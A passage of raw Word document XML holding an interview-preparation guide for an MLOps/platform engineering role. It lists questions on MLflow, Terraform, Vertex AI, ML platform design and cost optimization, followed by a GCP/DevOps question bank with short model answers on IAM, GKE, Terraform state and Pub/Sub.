      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLflow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Was model versioning required?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How did you implement model versioning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLflow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did you implement model versioning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How did rollback work using MLflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLflow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did rollback work using MLflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Which LLMs have you worked with?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMs &amp; AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the LLMs &amp; AI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LLMs have you worked with?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Have you integrated LLMs into your services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMs &amp; AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the LLMs &amp; AI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integrated LLMs into your services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Suppose your Vertex AI LLM endpoint usually responds in 300-400 ms, but suddenly starts taking 8-10 seconds. How would you investigate the issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the LLM Troubleshooting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Suppose your Vertex AI LLM endpoint usually responds in 300-400 ms, but suddenly starts taking 8-10 seconds. How would you investigate the issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Have you worked with Terraform or Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure as Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Infrastructure as Code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with Terraform or Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. Walk me through what you've built using Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure as Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Infrastructure as Code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Walk me through what you've built using Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. How have you used Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure as Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Infrastructure as Code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have you used Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. How do Terraform and Ansible work together in your projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure as Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Infrastructure as Code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do Terraform and Ansible work together in your projects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. Imagine multiple ML teams need self-service infrastructure for training and deploying models. How would you design such a platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Platform Design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Imagine multiple ML teams need self-service infrastructure for training and deploying models. How would you design such a platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How would you provide isolation between teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Platform Design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provide isolation between teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. How would you allow different teams to move at different speeds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Platform Design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allow different teams to move at different speeds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. How would you handle governance and security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Platform Design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handle governance and security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. How would you design observability for such an ML platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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would you design observability for such an ML platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. From an ML inference service perspective, which observability metrics are most important?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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From an ML inference service perspective, which observability metrics are most important?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. Your resume mentions achieving around 20% cloud cost savings. Can you explain that project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cost Optimization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cost Optimization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Your resume mentions achieving around 20% cloud cost savings. Can you explain that project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. How did you identify cost optimization opportunities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cost Optimization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cost Optimization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did you identify cost optimization opportunities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. What specific actions resulted in the savings?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cost Optimization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cost Optimization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specific actions resulted in the savings?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. If starting a new ML project today, would you choose Vertex AI or Kubernetes-based open-source tools?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Vertex AI vs Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Vertex AI vs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starting a new ML project today, would you choose Vertex AI or Kubernetes-based open-source tools?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. Why would you choose one over the other?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Vertex AI vs Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Vertex AI vs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Why would you choose one over the other?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. What are the trade-offs between Vertex AI and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Vertex AI vs Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Vertex AI vs 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are the trade-offs between Vertex AI and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. Have you ever had a disagreement with a Data Scientist or ML Engineer about deploying a model to production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Collaboration &amp; Conflict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Collaboration &amp; Conflict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ever had a disagreement with a Data Scientist or ML Engineer about deploying a model to production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. How did you resolve that disagreement?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Collaboration &amp; Conflict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Collaboration &amp; Conflict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did you resolve that disagreement?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. What was the outcome?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Collaboration &amp; Conflict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Collaboration &amp; Conflict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What was the outcome?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Part 2 — Topic Question Banks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The complete technical question bank organized by subject. Use this section to drill a specific technology or focus area in depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GCP / DevOps / SRE Question Bank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Python automation: How would you build a Python tool that audits GCP projects for IAM risk, public buckets, unused firewall rules, missing labels, and cost anomalies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the Resource Manager, IAM, Storage, and Compute client libraries to enumerate projects and pull IAM bindings (flagging broad roles like Owner on non-human accounts), bucket IAM policies (flagging allUsers/allAuthenticatedUsers), firewall rules unused in recent flow logs, and resources missing required labels. Combine this with a billing export query for week-over-week cost spikes, score findings by severity, and output a report or feed them into a ticketing system rather than auto-remediating blindly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Cloud security: How would you secure workload access to GCP services from GKE using Workload Identity, IAM, Secret Manager, and least privilege?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bind each Kubernetes ServiceAccount to a dedicated GCP service account via Workload Identity so pods get short-lived, automatically-rotated credentials instead of mounted JSON keys, and grant that GCP service account only the specific IAM roles the workload needs (not project-level Editor). Pull secrets at runtime from Secret Manager via the Workload Identity-bound identity rather than baking them into images or Kubernetes Secrets, and review bindings periodically to remove unused permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Vertex AI and MLOps: A team wants model serving on Kubernetes with FastAPI and GPU workloads. How would you design deployment, autoscaling, monitoring, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Package the model behind a FastAPI service in a container with GPU driver compatibility, deploy on a GPU node pool with taints/tolerations so only ML workloads schedule there, and autoscale using a custom metric (queue depth or GPU utilization) rather than plain CPU since GPU-bound inference doesn't correlate well with CPU usage. Monitor latency, throughput, and GPU utilization, and roll out changes via canary with automatic rollback if error rate or latency regresses beyond a threshold.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Go optional: Where would Go be useful in a platform engineering environment, and how would you decide between Go, Python, and Bash for automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Go is the right choice for building Kubernetes controllers/operators, CLIs distributed to many engineers (single static binary, fast startup), and any tool needing high concurrency or low resource overhead as a long-running service. Python is better for scripts with heavy API/data manipulation and faster iteration where startup time doesn't matter; Bash is fine for short glue scripts and simple orchestration but should be rewritten in Python or Go once it grows past a few dozen lines of real logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Terraform state: A Terraform apply failed halfway and now remote state does not match real GCP resources. How would you recover safely in an enterprise environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First run `terraform plan` to see the actual drift between state and reality without applying anything, and use `terraform state list`/`show` to identify exactly which resources are inconsistent. Use `terraform import` to bring resources that were created but not recorded in state back under management, or `terraform state rm` for resources that need to be recreated, and always take a state backup before any manual state surgery so you can revert if the recovery makes things worse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Cloud Run vs GKE: A company wants to standardize Cloud Run and GKE usage. How would you decide which workloads go to Cloud Run versus GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Run fits stateless, request-driven services with variable or bursty traffic that benefit from scale-to-zero and minimal operational overhead. GKE is the right choice for workloads needing fine-grained control - custom networking, sidecars, stateful sets, GPU scheduling, service mesh, or complex multi-container pods - and for teams that need Kubernetes-native tooling across many services. A simple heuristic: default new stateless services to Cloud Run, and only justify GKE when a specific requirement Cloud Run can't meet is identified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud SQL/AlloyDB: How would you troubleshoot a private GKE workload that cannot connect to Cloud SQL or AlloyDB?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether the connection uses the Cloud SQL Auth Proxy/sidecar or direct Private Service Access, and verify Private Google Access and the VPC peering range are correctly configured if using private IP. Confirm firewall rules allow the GKE pod CIDR to reach the database port, check the Cloud SQL instance's authorized networks or Private Service Connect config, and verify the service account has the cloudsql.client IAM role - a very common cause is the pod's Workload Identity binding missing that role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Pub/Sub reliability: A Pub/Sub consumer service is falling behind and message age is increasing. How would you debug backlog, scaling, ordering, retries, and dead-letter handling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the subscription's oldest unacked message age and undelivered message count in Cloud Monitoring to confirm backlog growth, then check whether the consumer is CPU/IO bound (needs more replicas/concurrency) or blocked on a slow downstream dependency. Review the ack deadline versus actual processing time (too short causes redundant redelivery), verify ordering keys aren't serializing throughput unnecessarily, and confirm a dead-letter topic is configured so poison messages don't block the subscription indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p>
